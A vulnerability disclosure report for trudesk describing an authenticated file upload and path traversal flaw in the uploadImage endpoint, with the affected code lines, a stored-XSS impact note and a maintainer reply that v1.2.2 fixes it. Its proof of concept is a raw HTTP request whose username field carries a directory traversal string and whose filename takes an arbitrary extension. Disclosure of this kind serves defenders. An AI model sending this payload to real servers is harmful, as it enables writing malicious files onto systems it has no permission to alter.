Unrestricted File Upload and Path Traversal in upload image in polonel/trudesk
Reported on
May 12th 2022
Description
The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.
Proof of Concept
1. Login
2. Upload profile image
3. Capture request, modify `username` and `filename`
POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"
/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"
627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg
<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--
Impact
Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)
Occurrences
accounts.js L485-L505
This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type
Hi, I see you have read the report. Is it hard to understand or the poc doesn't working?
This has been fixed in v1.2.2. I will update this report once it has been released.